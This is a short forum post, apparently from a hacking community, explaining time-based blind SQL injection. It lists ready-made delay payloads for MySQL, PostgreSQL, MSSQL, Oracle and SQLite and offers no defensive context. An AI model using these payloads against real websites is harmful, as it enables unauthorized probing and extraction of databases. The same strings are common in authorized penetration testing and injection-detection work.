ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 1780

Blind SQL injection | Example

by Firefly21 - 09-11-2023 - 05:17 PM
#1
The above technique focuses on measuring the load time of a web page after performing a SQL query. The goal is to determine whether an SQL injection has been successful by observing whether the SQL query has caused delays in loading the page. If the page takes longer to load after the SQL query, this could be an indication that a successful blind SQL injection has been performed.

MySQL (string concat and logical ops)
  • 1' + sleep(10)
  • 1' and sleep(10)
  • 1' && sleep (10)
  • 1' | sleep(10)
PostgreSQL (only support string concat)
  • 1' || pg_sleep (10)
MSQL
  • 1' WAITFOR DELAY '0:0:10'
ORACLE
  • 1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])
  • 1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE ('ASD' , 10)
SQLite
  • 1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB ( [SLEEPTIME] 00000000/2))))
  • 1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB (1000000000/2))))
In some cases the sleep functions won't be allowed. Then, instead of using those functions you could make the query perform complex operations that will take several seconds.
Reply

Users browsing: 2 Guest(s)